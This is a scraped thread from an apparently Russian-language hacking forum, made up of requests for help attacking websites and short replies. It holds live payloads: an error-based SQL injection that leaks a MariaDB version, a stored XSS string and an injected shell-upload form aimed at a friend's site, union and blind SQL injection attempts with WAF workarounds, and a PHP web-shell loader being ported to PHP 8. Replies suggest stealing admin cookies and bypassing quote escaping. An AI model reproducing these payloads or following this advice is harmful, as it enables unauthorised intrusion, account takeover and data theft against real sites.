Apache or Nginx? Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь https://rdot.org/forum/showthread.php?t=286 Думаю, что ничего интересного.
This exploit can be modified, but requires low level skills. Unfortunately, I haven't seen any simple bypasses.
Code: /ru/country/slovinsko"and(extractvalue(1,concat(0x3a,(select@@version))))="1/ Code: XPATH syntax error: ':10.0.35-MariaDB
Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении. Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут. Подскажите пожалуйста , где можно на русском языке найти информацию по IMP4GT ? Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники. Заранее спасибо.
Ну на сайте стоит что использовался стек srsLTE, ну и к тому же понадобится как минимум SDR который работает на частотах LTE (например limeSDR), хотя конкретно они использовали 2х Ettus USRP B210 (глава V.Setup)
Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь. Нашёл уязвимость на сайте своего друга, следующего вида: Code: Text' -->">'>'" Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки. На выходе получаю: Spoiler: ScreenShot Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки: Code: New York' -->"><form method="POST" action="https://sitefriends" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Upload"> </form>'>'" Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел. Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.
одной формы загрузки мало, у формы должен быть загрузчик, ты указал в поле action адрес, выходит логика такая что твоя форма отсылает на "морду" файл, но если в исходнике нет обработчика то ничего не произойдет. Судя по всему там хранимая XSS которую можно подсунуть админу и попробовать украсть куки авторизации и попасть в админку, либо сменить вектор атаки и попробовать найти в данных полях формы SQL INJ
есть уязвимый параметр в body payload для post запроса, но не могу понять как использовать union select. при ошибки синтаксиса, я ее не вижу, но в таком случае возвращается пустая страница возвращает полностью все с таблицы Code: month=8&year=2022 or 1=1 -- - возвращает пустую страницу => ошибка Code: month=8&year=2022 order by 2 -- - возвращает разметку. значит в запросе 1 колонка Code: month=8&year=2022 order by 1 -- - пытаюсь сделать union based атаку. пустая страница => ошибка Code: month=8&year=2022 union select 1 -- - поле которое есть в основном запросе это id, потому что такой запрос проходит Code: month=8&year=2022 order by id -- - скорей всего это подзапрос, или результат передается в другой используя технику с сравнением ascii могу достать данные, но это очень долго. есть возможность как то внедрить union select?
Есть Open Redirect там же xss site.com/login?next=asdfg в ответ получаю Location: asdfg <p>Found. Redirecting to <a href="asdfg">asdfg</a></p> Принимает javascript:alert() но Location все портит, нужно этот Redirect сломать что бы все сработало. Пробовал варианты из таблицы https://habr.com/ru/company/pt/blog/247709/ но редирект даже если не происходит ответ мне не показывает. Есть что то актуальное?
Подскажите по web шеллу, как вернее его будет поправить для php8? PHP: $j___wp=create_function('',$j__wp);unset($j_wp,$j__wp);$j___wp(); А то с этим create_function((
есть таблица admin. запрос select column_name from information_schema.columns where table_name='admin' limit 1 -> 500 ошибка запрос select column_name from information_schema.columns where table_name=concat('ad', 'min') limit 1 -> проходит есть способы как достать данные с таблицы когда в url встречается слово admin, то всегда 500 ошибка? пробовал в разном регистре писать, не помогает
Почитать, например. https://forum.antichat.com/threads/104591/ Вопрос №4 Не могу вывести данные (Вытекает из предыдущего) table_name='users' Ошибка Скорее всего magic_quotes_gpc = On , и соответственно кавычки слешируются И снова целых 2 варианта. Перевести название таблицы/колонки в hex или в CHAR, кому как нравится Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем): union+select+1,table_rows+from+information_schema.tables+where+table_name=0x7573657273 для CHAR так: union+select+1,table_rows+from+information_schema.tables+where+table_name=char(117,115,101,114,115) Как видим обошлись без кавычек (сдесь table_name=users) Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )
спасибо, но я написал что вытащить колонку получилось через конкатенации. проблема в том что бы достать данные из самой таблицы admin, то есть select username,pass from admin
Привет подскажите пожалуйста как вычислить зараженный JS ? https://www.google.com/search?q=htt...IBBDAuMTWYAQCgAQKgAQHIAQrAAQE&sclient=gws-wiz https://www.google.com/search?q=htt...YYBiAGGAZIBAzAuMZgBAKABAcABAQ&sclient=gws-wiz